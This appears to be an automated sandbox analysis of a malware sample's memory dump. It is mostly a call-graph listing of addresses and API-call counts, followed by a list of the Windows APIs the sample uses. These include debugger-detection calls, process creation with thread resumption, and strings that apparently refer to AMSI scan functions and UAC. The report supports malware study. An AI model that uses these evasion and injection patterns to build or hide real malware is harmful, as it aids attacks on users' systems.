API calls 36625->36626 36627 2dd57e3 36626->36627 36628 2db47ec 11 API calls 36627->36628 36629 2dd581a 36628->36629 36630 2dc89d0 20 API calls 36629->36630 36631 2dd583e 36630->36631 37893 2db7acc 36631->37893 36636 2db4530 11 API calls 36637 2dd586a 36636->36637 36638 2db4860 11 API calls 36637->36638 36639 2dd588b 36638->36639 36640 2db47ec 11 API calls 36639->36640 36641 2dd58c2 36640->36641 36642 2dc89d0 20 API calls 36641->36642 36643 2dd58e6 36642->36643 36644 2db4860 11 API calls 36643->36644 36645 2dd5907 36644->36645 36646 2db47ec 11 API calls 36645->36646 36647 2dd593e 36646->36647 36648 2dc89d0 20 API calls 36647->36648 36649 2dd5962 36648->36649 36650 2db4860 11 API calls 36649->36650 36651 2dd5983 36650->36651 36652 2db47ec 11 API calls 36651->36652 36653 2dd59ba 36652->36653 36654 2dc89d0 20 API calls 36653->36654 36655 2dd59de 36654->36655 36656 2db4860 11 API calls 36655->36656 36657 2dd59ff 36656->36657 36658 2db47ec 11 API calls 36657->36658 36659 2dd5a36 36658->36659 36660 2dc89d0 20 API calls 36659->36660 36661 2dd5a5a 36660->36661 36662 2dcf094 11 API calls 36661->36662 36663 2dd5a6a 36662->36663 37906 2dcf108 36663->37906 36666 2db4530 11 API calls 36667 2dd5a8b 36666->36667 36668 2db4860 11 API calls 36667->36668 36669 2dd5aac 36668->36669 36670 2db47ec 11 API calls 36669->36670 36671 2dd5ae3 36670->36671 36672 2dc89d0 20 API calls 36671->36672 36673 2dd5b07 36672->36673 36674 2db4860 11 API calls 36673->36674 36675 2dd5b28 36674->36675 36676 2db47ec 11 API calls 36675->36676 36677 2dd5b5f 36676->36677 36678 2dc89d0 20 API calls 36677->36678 36679 2dd5b83 36678->36679 36680 2db4860 11 API calls 36679->36680 36681 2dd5ba4 36680->36681 36682 2db47ec 11 API calls 36681->36682 36683 2dd5bdb 36682->36683 36684 2dc89d0 20 API calls 36683->36684 36685 2dd5bff 36684->36685 36686 2db4860 11 API calls 36685->36686 36687 2dd5c20 36686->36687 36688 2db47ec 11 API calls 36687->36688 36689 2dd5c57 36688->36689 36690 2dc89d0 20 API calls 36689->36690 36691 
2dd5c7b 36690->36691 36692 2db4860 11 API calls 36691->36692 36693 2dd5c9c 36692->36693 36694 2db47ec 11 API calls 36693->36694 36695 2dd5cd3 36694->36695 36696 2dc89d0 20 API calls 36695->36696 36697 2dd5cf7 36696->36697 36698 2db4860 11 API calls 36697->36698 36699 2dd5d18 36698->36699 36700 2db47ec 11 API calls 36699->36700 36701 2dd5d4f 36700->36701 36702 2dc89d0 20 API calls 36701->36702 36704 2dd5d73 36702->36704 36703 2dd7568 36705 2db4860 11 API calls 36703->36705 36704->36703 36706 2db4860 11 API calls 36704->36706 36707 2dd7589 36705->36707 36708 2dd5da8 36706->36708 36710 2db47ec 11 API calls 36707->36710 37911 2db7e5c 36708->37911 36714 2dd75c0 36710->36714 36712 2dd5dd3 36713 2db4860 11 API calls 36712->36713 36717 2dd5df4 36713->36717 36715 2dc89d0 20 API calls 36714->36715 36716 2dd75e4 36715->36716 36718 2db4860 11 API calls 36716->36718 36719 2db47ec 11 API calls 36717->36719 36720 2dd7605 36718->36720 36721 2dd5e2b 36719->36721 36722 2db47ec 11 API calls 36720->36722 36723 2dc89d0 20 API calls 36721->36723 36726 2dd763c 36722->36726 36724 2dd5e4f 36723->36724 36725 2db4860 11 API calls 36724->36725 36729 2dd5e70 36725->36729 36727 2dc89d0 20 API calls 36726->36727 36728 2dd7660 36727->36728 36730 2db4860 11 API calls 36728->36730 36731 2db47ec 11 API calls 36729->36731 36732 2dd7681 36730->36732 36733 2dd5ea7 36731->36733 36734 2db47ec 11 API calls 36732->36734 36735 2dc89d0 20 API calls 36733->36735 36738 2dd76b8 36734->36738 36736 2dd5ecb 36735->36736 36737 2db4860 11 API calls 36736->36737 36740 2dd5eec 36737->36740 36739 2dc89d0 20 API calls 36738->36739 36741 2dd76dc 36739->36741 36743 2db47ec 11 API calls 36740->36743 36742 2db4860 11 API calls 36741->36742 36744 2dd76fd 36742->36744 36745 2dd5f23 36743->36745 36746 2db47ec 11 API calls 36744->36746 36747 2dc89d0 20 API calls 36745->36747 36750 2dd7734 36746->36750 36748 2dd5f47 36747->36748 36749 2db4860 11 API calls 36748->36749 36752 2dd5f68 36749->36752 36751 2dc89d0 20 API calls 
36750->36751 36753 2dd7758 36751->36753 36755 2db4860 11 API calls 36752->36755 36754 2db4860 11 API calls 36753->36754 36756 2dd7779 36754->36756 36757 2dd5fa0 36755->36757 36758 2db47ec 11 API calls 36756->36758 36759 2db47ec 11 API calls 36757->36759 36760 2dd77b0 36758->36760 36761 2dd5fd7 36759->36761 36762 2dc89d0 20 API calls 36760->36762 36763 2dc89d0 20 API calls 36761->36763 36764 2dd77d4 36762->36764 36765 2dd5ffb 36763->36765 36767 2dd77e9 36764->36767 36768 2dd8318 36764->36768 36766 2db4860 11 API calls 36765->36766 36771 2dd601c 36766->36771 36770 2db4860 11 API calls 36767->36770 36769 2db4860 11 API calls 36768->36769 36774 2dd8339 36769->36774 36772 2dd780a 36770->36772 36773 2db47ec 11 API calls 36771->36773 36776 2db47ec 11 API calls 36772->36776 36777 2dd6053 36773->36777 36775 2db47ec 11 API calls 36774->36775 36778 2dd8370 36775->36778 36779 2dd7841 36776->36779 36780 2dc89d0 20 API calls 36777->36780 36783 2dc89d0 20 API calls 36778->36783 36784 2dc89d0 20 API calls 36779->36784 36781 2dd6077 36780->36781 36782 2db4860 11 API calls 36781->36782 36789 2dd6098 36782->36789 36785 2dd8394 36783->36785 36786 2dd7865 36784->36786 36787 2db4860 11 API calls 36785->36787 36788 2db4860 11 API calls 36786->36788 36792 2dd83b5 36787->36792 36790 2dd7886 36788->36790 36791 2db47ec 11 API calls 36789->36791 36793 2db47ec 11 API calls 36790->36793 36795 2dd60cf 36791->36795 36794 2db47ec 11 API calls 36792->36794 36797 2dd78bd 36793->36797 36796 2dd83ec 36794->36796 36798 2dc89d0 20 API calls 36795->36798 36800 2dc89d0 20 API calls 36796->36800 36801 2dc89d0 20 API calls 36797->36801 36799 2dd60f3 36798->36799 36802 2db4860 11 API calls 36799->36802 36803 2dd8410 36800->36803 36804 2dd78e1 36801->36804 36807 2dd6114 36802->36807 36805 2db4860 11 API calls 36803->36805 36806 2db4860 11 API calls 36804->36806 36809 2dd8431 36805->36809 36810 2dd7902 36806->36810 36808 2db47ec 11 API calls 36807->36808 36813 2dd614b 36808->36813 36812 2db47ec 11 API calls 
36809->36812 36811 2db47ec 11 API calls 36810->36811 36815 2dd7939 36811->36815 36814 2dd8468 36812->36814 36816 2dc89d0 20 API calls 36813->36816 36818 2dc89d0 20 API calls 36814->36818 36819 2dc89d0 20 API calls 36815->36819 36817 2dd616f 36816->36817 36820 2db4860 11 API calls 36817->36820 36821 2dd848c 36818->36821 36822 2dd795d 36819->36822 36826 2dd61a9 36820->36826 36823 2db4860 11 API calls 36821->36823 36824 2db47ec 11 API calls 36822->36824 36828 2dd84ad 36823->36828 36825 2dd7975 36824->36825 36829 2dc85bc 18 API calls 36825->36829 36827 2db4860 11 API calls 36826->36827 36833 2dd61e1 36827->36833 36831 2db47ec 11 API calls 36828->36831 36830 2dd7986 36829->36830 36832 2db4860 11 API calls 36830->36832 36836 2dd84e4 36831->36836 36834 2dd79a7 36832->36834 36835 2db47ec 11 API calls 36833->36835 36838 2db47ec 11 API calls 36834->36838 36840 2dd6218 36835->36840 36837 2dc89d0 20 API calls 36836->36837 36839 2dd8508 36837->36839 36843 2dd79de 36838->36843 36841 2dd851d 36839->36841 36842 2dd93a1 36839->36842 36844 2dc89d0 20 API calls 36840->36844 36846 2db4860 11 API calls 36841->36846 36845 2db4860 11 API calls 36842->36845 36850 2dc89d0 20 API calls 36843->36850 36847 2dd623c 36844->36847 36853 2dd93c2 36845->36853 36849 2dd853e 36846->36849 36848 2db4860 11 API calls 36847->36848 36855 2dd625d 36848->36855 36854 2dd8556 36849->36854 36851 2dd7a02 36850->36851 36852 2db4860 11 API calls 36851->36852 36858 2dd7a23 36852->36858 36856 2db47ec 11 API calls 36853->36856 36857 2db47ec 11 API calls 36854->36857 36859 2db47ec 11 API calls 36855->36859 36862 2dd93f9 36856->36862 36860 2dd8575 36857->36860 36861 2db47ec 11 API calls 36858->36861 36864 2dd6294 36859->36864 36863 2dd858d 36860->36863 36868 2dd7a5a 36861->36868 36866 2dc89d0 20 API calls 36862->36866 36865 2dc89d0 20 API calls 36863->36865 36869 2dc89d0 20 API calls 36864->36869 36867 2dd8599 36865->36867 36870 2dd941d 36866->36870 36871 2db4860 11 API calls 36867->36871 36875 2dc89d0 20 API calls 
36868->36875 36872 2dd62b8 36869->36872 36873 2db4860 11 API calls 36870->36873 36874 2dd85ba 36871->36874 36876 2db4860 11 API calls 36872->36876 36879 2dd943e 36873->36879 36881 2dd85c5 36874->36881 36877 2dd7a7e 36875->36877 36880 2dd62d9 36876->36880 36878 2db4860 11 API calls 36877->36878 36886 2dd7a9f 36878->36886 36882 2db47ec 11 API calls 36879->36882 36884 2db47ec 11 API calls 36880->36884 36883 2db47ec 11 API calls 36881->36883 36888 2dd9475 36882->36888 36885 2dd85f1 36883->36885 36889 2dd6310 36884->36889 36890 2dd85fc 36885->36890 36887 2db47ec 11 API calls 36886->36887 36894 2dd7ad6 36887->36894 36891 2dc89d0 20 API calls 36888->36891 36895 2dc89d0 20 API calls 36889->36895 36892 2dc89d0 20 API calls 36890->36892 36896 2dd9499 36891->36896 36893 2dd8615 36892->36893 36897 2db4860 11 API calls 36893->36897 36900 2dc89d0 20 API calls 36894->36900 36898 2dd6334 36895->36898 36899 2db4860 11 API calls 36896->36899 36903 2dd8636 36897->36903 36901 2db4860 11 API calls 36898->36901 36902 2dd94ba 36899->36902 36905 2dd7afa 36900->36905 36904 2dd6355 36901->36904 36906 2db47ec 11 API calls 36902->36906 36907 2db47ec 11 API calls 36903->36907 36908 2db47ec 11 API calls 36904->36908 38335 2dcadf8 29 API calls 36905->38335 36912 2dd94f1 36906->36912 36913 2dd866d 36907->36913 36914 2dd638c 36908->36914 36910 2dd7b21 36911 2db4860 11 API calls 36910->36911 36917 2dd7b42 36911->36917 36915 2dc89d0 20 API calls 36912->36915 36916 2dc89d0 20 API calls 36913->36916 36918 2dc89d0 20 API calls 36914->36918 36928 2dd9515 36915->36928 36919 2dd8691 36916->36919 36923 2db47ec 11 API calls 36917->36923 36920 2dd63b0 36918->36920 36921 2db47ec 11 API calls 36919->36921 36924 2db4860 11 API calls 36920->36924 36922 2dd86bd 36921->36922 36927 2dd86d5 36922->36927 36929 2dd7b79 36923->36929 36930 2dd63d1 36924->36930 36925 2dd9cf5 36926 2db4860 11 API calls 36925->36926 36933 2dd9d16 36926->36933 36934 2dd86e0 CreateProcessAsUserW 36927->36934 36928->36925 36931 2db4860 11 API 
calls 36928->36931 36935 2dc89d0 20 API calls 36929->36935 36932 2db47ec 11 API calls 36930->36932 36943 2dd9560 36931->36943 36945 2dd6408 36932->36945 36939 2db47ec 11 API calls 36933->36939 36936 2dd876e 36934->36936 36937 2dd86f2 36934->36937 36938 2dd7b9d 36935->36938 36940 2db4860 11 API calls 36936->36940 36941 2db4860 11 API calls 36937->36941 36942 2db4860 11 API calls 36938->36942 36950 2dd9d4d 36939->36950 36951 2dd878f 36940->36951 36944 2dd8713 36941->36944 36948 2dd7bbe 36942->36948 36946 2db47ec 11 API calls 36943->36946 36947 2dd871e 36944->36947 36949 2dc89d0 20 API calls 36945->36949 36958 2dd9597 36946->36958 36957 2db47ec 11 API calls 36947->36957 36953 2db47ec 11 API calls 36948->36953 36952 2dd642c 36949->36952 36955 2dc89d0 20 API calls 36950->36955 36956 2db47ec 11 API calls 36951->36956 36954 2db4860 11 API calls 36952->36954 36965 2dd7bf5 36953->36965 36966 2dd644d 36954->36966 36959 2dd9d71 36955->36959 36964 2dd87c6 36956->36964 36960 2dd874a 36957->36960 36963 2dc89d0 20 API calls 36958->36963 36961 2db4860 11 API calls 36959->36961 36962 2dd8755 36960->36962 36969 2dd9d92 36961->36969 36971 2dc89d0 20 API calls 36962->36971 36967 2dd95bb 36963->36967 36970 2dc89d0 20 API calls 36964->36970 36972 2dc89d0 20 API calls 36965->36972 36973 2db47ec 11 API calls 36966->36973 36968 2db4860 11 API calls 36967->36968 36979 2dd95dc 36968->36979 36976 2db47ec 11 API calls 36969->36976 36974 2dd87ea 36970->36974 36971->36936 36975 2dd7c19 36972->36975 36980 2dd6484 36973->36980 36977 2db4860 11 API calls 36974->36977 36978 2db4860 11 API calls 36975->36978 36983 2dd9dc9 36976->36983 36984 2dd880b 36977->36984 36985 2dd7c3a 36978->36985 36981 2db47ec 11 API calls 36979->36981 36982 2dc89d0 20 API calls 36980->36982 36992 2dd9613 36981->36992 36986 2dd64a8 36982->36986 36989 2dc89d0 20 API calls 36983->36989 36990 2db47ec 11 API calls 36984->36990 36987 2db47ec 11 API calls 36985->36987 36988 2db4860 11 API calls 36986->36988 36996 2dd7c71 
36987->36996 36991 2dd64d5 36988->36991 36993 2dd9ded 36989->36993 36999 2dd8842 36990->36999 37915 2dc85bc 36991->37915 36995 2dc89d0 20 API calls 36992->36995 36994 2db4860 11 API calls 36993->36994 37002 2dd9e0e 36994->37002 36998 2dd9637 36995->36998 37004 2dc89d0 20 API calls 36996->37004 37001 2db4860 11 API calls 36998->37001 37003 2dc89d0 20 API calls 36999->37003 37009 2dd9658 37001->37009 37008 2db47ec 11 API calls 37002->37008 37006 2dd8866 37003->37006 37007 2dd7c95 37004->37007 37005 2db4860 11 API calls 37011 2dd6507 37005->37011 37010 2db49f8 11 API calls 37006->37010 37013 2db4860 11 API calls 37007->37013 37016 2dd9e45 37008->37016 37014 2db47ec 11 API calls 37009->37014 37012 2dd888a 37010->37012 37015 2db47ec 11 API calls 37011->37015 37017 2db4860 11 API calls 37012->37017 37020 2dd7cd5 37013->37020 37021 2dd968f 37014->37021 37023 2dd653e 37015->37023 37018 2dc89d0 20 API calls 37016->37018 37019 2dd88b9 37017->37019 37027 2dd9e69 37018->37027 37028 2dd88c4 37019->37028 37022 2db47ec 11 API calls 37020->37022 37024 2dc89d0 20 API calls 37021->37024 37032 2dd7d0c 37022->37032 37025 2dc89d0 20 API calls 37023->37025 37026 2dd96b3 37024->37026 37029 2dd6562 37025->37029 37030 2dcf094 11 API calls 37026->37030 37035 2dc89d0 20 API calls 37027->37035 37031 2db47ec 11 API calls 37028->37031 37033 2db4860 11 API calls 37029->37033 37034 2dd96ce 37030->37034 37036 2dd88f0 37031->37036 37038 2dc89d0 20 API calls 37032->37038 37043 2dd6583 37033->37043 37037 2db4860 11 API calls 37034->37037 37040 2dd9e9c 37035->37040 37041 2dd88fb 37036->37041 37044 2dd96f7 37037->37044 37039 2dd7d30 37038->37039 37042 2db4860 11 API calls 37039->37042 37047 2dc89d0 20 API calls 37040->37047 37045 2dc89d0 20 API calls 37041->37045 37051 2dd7d51 37042->37051 37046 2db47ec 11 API calls 37043->37046 37049 2db4860 11 API calls 37044->37049 37048 2dd8914 37045->37048 37052 2dd65ba 37046->37052 37053 2dd9ecf 37047->37053 37050 2db4860 11 API calls 37048->37050 37055 2dd972f 
37049->37055 37056 2dd8935 37050->37056 37054 2db47ec 11 API calls 37051->37054 37057 2dc89d0 20 API calls 37052->37057 37058 2dc89d0 20 API calls 37053->37058 37062 2dd7d88 37054->37062 37060 2db47ec 11 API calls 37055->37060 37061 2db47ec 11 API calls 37056->37061 37059 2dd65de 37057->37059 37065 2dd9f02 37058->37065 37063 2db4860 11 API calls 37059->37063 37068 2dd9766 37060->37068 37066 2dd896c 37061->37066 37064 2dc89d0 20 API calls 37062->37064 37071 2dd65ff 37063->37071 37067 2dd7dac 37064->37067 37069 2dc89d0 20 API calls 37065->37069 37073 2dc89d0 20 API calls 37066->37073 37070 2db4860 11 API calls 37067->37070 37074 2dc89d0 20 API calls 37068->37074 37072 2dd9f35 37069->37072 37081 2dd7dcd 37070->37081 37078 2db47ec 11 API calls 37071->37078 37076 2db4860 11 API calls 37072->37076 37077 2dd8990 37073->37077 37075 2dd978a 37074->37075 37079 2db4860 11 API calls 37075->37079 37083 2dd9f56 37076->37083 37080 2db4860 11 API calls 37077->37080 37082 2dd6636 37078->37082 37085 2dd97ab 37079->37085 37086 2dd89b1 37080->37086 37084 2db47ec 11 API calls 37081->37084 37087 2dc89d0 20 API calls 37082->37087 37088 2db47ec 11 API calls 37083->37088 37092 2dd7e04 37084->37092 37090 2db47ec 11 API calls 37085->37090 37091 2db47ec 11 API calls 37086->37091 37089 2dd665a 37087->37089 37095 2dd9f8d 37088->37095 37093 2db4860 11 API calls 37089->37093 37097 2dd97e2 37090->37097 37098 2dd89e8 37091->37098 37094 2dc89d0 20 API calls 37092->37094 37100 2dd667b 37093->37100 37096 2dd7e28 37094->37096 37101 2dc89d0 20 API calls 37095->37101 38336 2dc5aec 42 API calls 37096->38336 37104 2dc89d0 20 API calls 37097->37104 37102 2dc89d0 20 API calls 37098->37102 37109 2db47ec 11 API calls 37100->37109 37105 2dd9fb1 37101->37105 37107 2dd8a0c 37102->37107 37110 2dd9806 37104->37110 37106 2db4860 11 API calls 37105->37106 37121 2dd9fd2 37106->37121 38345 2dcd164 23 API calls 37107->38345 37108 2dd7e54 37117 2db4bcc 11 API calls 37108->37117 37118 2dd66b2 37109->37118 37112 2db7e5c 
GetFileAttributesA 37110->37112 37113 2dd9810 37112->37113 37115 2dd9aef 37113->37115 37119 2db4860 11 API calls 37113->37119 37114 2dd8a20 37116 2db4860 11 API calls 37114->37116 37120 2db4860 11 API calls 37115->37120 37126 2dd8a46 37116->37126 37122 2dd7e69 37117->37122 37124 2dc89d0 20 API calls 37118->37124 37127 2dd9839 37119->37127 37128 2dd9b10 37120->37128 37125 2db47ec 11 API calls 37121->37125 37123 2db4860 11 API calls 37122->37123 37129 2dd7e8a 37123->37129 37132 2dd66d6 37124->37132 37135 2dda009 37125->37135 37130 2db47ec 11 API calls 37126->37130 37133 2db47ec 11 API calls 37127->37133 37134 2db47ec 11 API calls 37128->37134 37136 2db47ec 11 API calls 37129->37136 37141 2dd8a7d 37130->37141 37131 2dd6949 37138 2db4860 11 API calls 37131->37138 37132->37131 37137 2db4860 11 API calls 37132->37137 37142 2dd9870 37133->37142 37143 2dd9b47 37134->37143 37139 2dc89d0 20 API calls 37135->37139 37146 2dd7ec1 37136->37146 37147 2dd670c 37137->37147 37148 2dd696a 37138->37148 37140 2dda02d 37139->37140 37144 2db4860 11 API calls 37140->37144 37145 2dc89d0 20 API calls 37141->37145 37151 2dc89d0 20 API calls 37142->37151 37149 2dc89d0 20 API calls 37143->37149 37160 2dda04e 37144->37160 37150 2dd8aa1 37145->37150 37155 2dc89d0 20 API calls 37146->37155 37156 2db47ec 11 API calls 37147->37156 37152 2db47ec 11 API calls 37148->37152 37153 2dd9b6b 37149->37153 37154 2db4860 11 API calls 37150->37154 37157 2dd9894 37151->37157 37164 2dd69a1 37152->37164 37159 2db4860 11 API calls 37153->37159 37165 2dd8ac2 37154->37165 37161 2dd7ee5 37155->37161 37163 2dd6743 37156->37163 37158 2db4860 11 API calls 37157->37158 37167 2dd98b5 37158->37167 37168 2dd9b8c 37159->37168 37162 2db47ec 11 API calls 37160->37162 38337 2db49f8 37161->38337 37179 2dda085 37162->37179 37170 2dc89d0 20 API calls 37163->37170 37171 2dc89d0 20 API calls 37164->37171 37172 2db47ec 11 API calls 37165->37172 37176 2db47ec 11 API calls 37167->37176 37178 2db47ec 11 API calls 37168->37178 37175 
2dd6767 37170->37175 37177 2dd69c5 37171->37177 37184 2dd8af9 37172->37184 37174 2dd7f08 37180 2db4860 11 API calls 37174->37180 37181 2db4860 11 API calls 37175->37181 37185 2dd98ec 37176->37185 37182 2db4860 11 API calls 37177->37182 37186 2dd9bc3 37178->37186 37183 2dc89d0 20 API calls 37179->37183 37187 2dd7f29 37180->37187 37188 2dd6788 37181->37188 37189 2dd69e6 37182->37189 37193 2dda0a9 37183->37193 37190 2dc89d0 20 API calls 37184->37190 37191 2dc89d0 20 API calls 37185->37191 37192 2dc89d0 20 API calls 37186->37192 37196 2db47ec 11 API calls 37187->37196 37197 2db47ec 11 API calls 37188->37197 37199 2db47ec 11 API calls 37189->37199 37194 2dd8b1d 37190->37194 37198 2dd9910 37191->37198 37200 2dd9be7 37192->37200 37202 2dc89d0 20 API calls 37193->37202 37195 2db4860 11 API calls 37194->37195 37205 2dd8b3e 37195->37205 37206 2dd7f60 37196->37206 37207 2dd67bf 37197->37207 37203 2db4860 11 API calls 37198->37203 37204 2dd6a1d 37199->37204 37201 2db4860 11 API calls 37200->37201 37209 2dd9c08 37201->37209 37210 2dda0dc 37202->37210 37208 2dd9931 37203->37208 37212 2dc89d0 20 API calls 37204->37212 37213 2db47ec 11 API calls 37205->37213 37214 2dc89d0 20 API calls 37206->37214 37211 2dc89d0 20 API calls 37207->37211 37216 2db47ec 11 API calls 37208->37216 37218 2db47ec 11 API calls 37209->37218 37219 2dc89d0 20 API calls 37210->37219 37215 2dd67e3 37211->37215 37217 2dd6a41 37212->37217 37224 2dd8b75 37213->37224 37220 2dd7f84 37214->37220 37221 2db4860 11 API calls 37215->37221 37225 2dd9968 37216->37225 37222 2db4860 11 API calls 37217->37222 37226 2dd9c3f 37218->37226 37227 2dda10f 37219->37227 37223 2db4860 11 API calls 37220->37223 37229 2dd6804 37221->37229 37230 2dd6a62 37222->37230 37228 2dd7fa5 37223->37228 37231 2dc89d0 20 API calls 37224->37231 37232 2dc89d0 20 API calls 37225->37232 37233 2dc89d0 20 API calls 37226->37233 37234 2dc89d0 20 API calls 37227->37234 37236 2db47ec 11 API calls 37228->37236 37237 2db47ec 11 API calls 37229->37237 37239 
2db47ec 11 API calls 37230->37239 37235 2dd8b99 37231->37235 37238 2dd998c 37232->37238 37240 2dd9c63 37233->37240 37248 2dda142 37234->37248 37241 2dd8bb9 37235->37241 37242 2dd8ba2 37235->37242 37251 2dd7fdc 37236->37251 37252 2dd683b 37237->37252 37244 2dce358 11 API calls 37238->37244 37250 2dd6a99 37239->37250 37245 2db4860 11 API calls 37240->37245 37243 2db4860 11 API calls 37241->37243 38346 2dc8730 17 API calls 37242->38346 37257 2dd8bda 37243->37257 37247 2dd99a1 37244->37247 37255 2dd9c84 37245->37255 37249 2db4530 11 API calls 37247->37249 37256 2dc89d0 20 API calls 37248->37256 37253 2dd99b1 37249->37253 37258 2dc89d0 20 API calls 37250->37258 37259 2dc89d0 20 API calls 37251->37259 37260 2dc89d0 20 API calls 37252->37260 37254 2db4860 11 API calls 37253->37254 37269 2dd99d2 37254->37269 37263 2db47ec 11 API calls 37255->37263 37270 2dda175 37256->37270 37264 2db47ec 11 API calls 37257->37264 37262 2dd6abd 37258->37262 37265 2dd8000 37259->37265 37261 2dd685f 37260->37261 37266 2db4860 11 API calls 37261->37266 37267 2db4860 11 API calls 37262->37267 37272 2dd9cbb 37263->37272 37274 2dd8c11 37264->37274 37268 2db4860 11 API calls 37265->37268 37276 2dd6880 37266->37276 37277 2dd6ade 37267->37277 37275 2dd8021 37268->37275 37271 2db47ec 11 API calls 37269->37271 37273 2dc89d0 20 API calls 37270->37273 37287 2dd9a09 37271->37287 37279 2dc89d0 20 API calls 37272->37279 37278 2dda1a8 37273->37278 37281 2dc89d0 20 API calls 37274->37281 37282 2db47ec 11 API calls 37275->37282 37283 2db47ec 11 API calls 37276->37283 37284 2db47ec 11 API calls 37277->37284 37280 2db4860 11 API calls 37278->37280 37285 2dd9cdf 37279->37285 37293 2dda1c9 37280->37293 37286 2dd8c35 37281->37286 37294 2dd8058 37282->37294 37295 2dd68b7 37283->37295 37297 2dd6b15 37284->37297 37288 2db49f8 11 API calls 37285->37288 37289 2db4860 11 API calls 37286->37289 37291 2dc89d0 20 API calls 37287->37291 37290 2dd9ce9 37288->37290 37299 2dd8c56 37289->37299 37932 2dc8d70 37290->37932 37296 
2dd9a2d 37291->37296 37298 2db47ec 11 API calls 37293->37298 37302 2dc89d0 20 API calls 37294->37302 37303 2dc89d0 20 API calls 37295->37303 37300 2db4860 11 API calls 37296->37300 37301 2dc89d0 20 API calls 37297->37301 37312 2dda200 37298->37312 37305 2db47ec 11 API calls 37299->37305 37311 2dd9a4e 37300->37311 37304 2dd6b39 37301->37304 37306 2dd807c 37302->37306 37307 2dd68db 37303->37307 37308 2db4860 11 API calls 37304->37308 37315 2dd8c8d 37305->37315 37309 2db4860 11 API calls 37306->37309 37310 2db4860 11 API calls 37307->37310 37316 2dd6b5a 37308->37316 37318 2dd809d 37309->37318 37324 2dd68fc 37310->37324 37313 2db47ec 11 API calls 37311->37313 37314 2dc89d0 20 API calls 37312->37314 37325 2dd9a85 37313->37325 37317 2dda224 37314->37317 37320 2dc89d0 20 API calls 37315->37320 37322 2db47ec 11 API calls 37316->37322 37319 2db4860 11 API calls 37317->37319 37321 2db47ec 11 API calls 37318->37321 37328 2dda245 37319->37328 37323 2dd8cb1 37320->37323 37329 2dd80d4 37321->37329 37331 2dd6b91 37322->37331 37326 2db4860 11 API calls 37323->37326 37330 2dcdc8c 17 API calls 37324->37330 37327 2dc89d0 20 API calls 37325->37327 37332 2dd8cd2 37326->37332 37342 2dd9aa9 37327->37342 37333 2db47ec 11 API calls 37328->37333 37334 2dc89d0 20 API calls 37329->37334 37330->37131 37335 2dc89d0 20 API calls 37331->37335 37337 2db47ec 11 API calls 37332->37337 37341 2dda27c 37333->37341 37338 2dd80f8 37334->37338 37336 2dd6bb5 37335->37336 37339 2db4860 11 API calls 37336->37339 37345 2dd8d09 37337->37345 38344 2dcb118 39 API calls 37338->38344 37346 2dd6bd6 37339->37346 37344 2dc89d0 20 API calls 37341->37344 37343 2dcdc8c 17 API calls 37342->37343 37343->37115 37351 2dda2a0 37344->37351 37348 2dc89d0 20 API calls 37345->37348 37349 2db47ec 11 API calls 37346->37349 37347 2dd8109 37350 2dd8d2d ResumeThread 37348->37350 37354 2dd6c0d 37349->37354 37352 2db4860 11 API calls 37350->37352 37353 2dc89d0 20 API calls 37351->37353 37357 2dd8d59 37352->37357 37355 2dda2d3 
APIs
• InetIsOffline.URL(00000000,00000000,02DDB784,?,?,?,00000000,00000000), ref: 02DCF801
• Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
• Part of subcall function 02DCF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02DCFAEB,UacInitialize,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,Initialize), ref: 02DCF6EE
• Part of subcall function 02DCF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DCF700
• Part of subcall function 02DCF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02DCF754
• Part of subcall function 02DCF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DCF766
• Part of subcall function 02DCF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DCF77D
• Part of subcall function 02DB7E5C: GetFileAttributesA.KERNEL32(00000000,?,02DD041F,ScanString,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,UacInitialize), ref: 02DB7E67
• Part of subcall function 02DBC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02F2B8B8,?,02DD0751,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession), ref: 02DBC37B
• Part of subcall function 02DCDD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DCDE40), ref: 02DCDDAB
• Part of subcall function 02DCDD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DCDE40), ref: 02DCDDDB
• Part of subcall function 02DCDD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DCDDF0
• Part of subcall function 02DCDD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DCDE1C
• Part of subcall function 02DCDD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DCDE25
• Part of subcall function 02DB7E80: GetFileAttributesA.KERNEL32(00000000,?,02DD356F,ScanString,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,Initialize), ref: 02DB7E8B
• Part of subcall function 02DB8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02DD370D,OpenSession,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,Initialize,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8), ref: 02DB8055
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
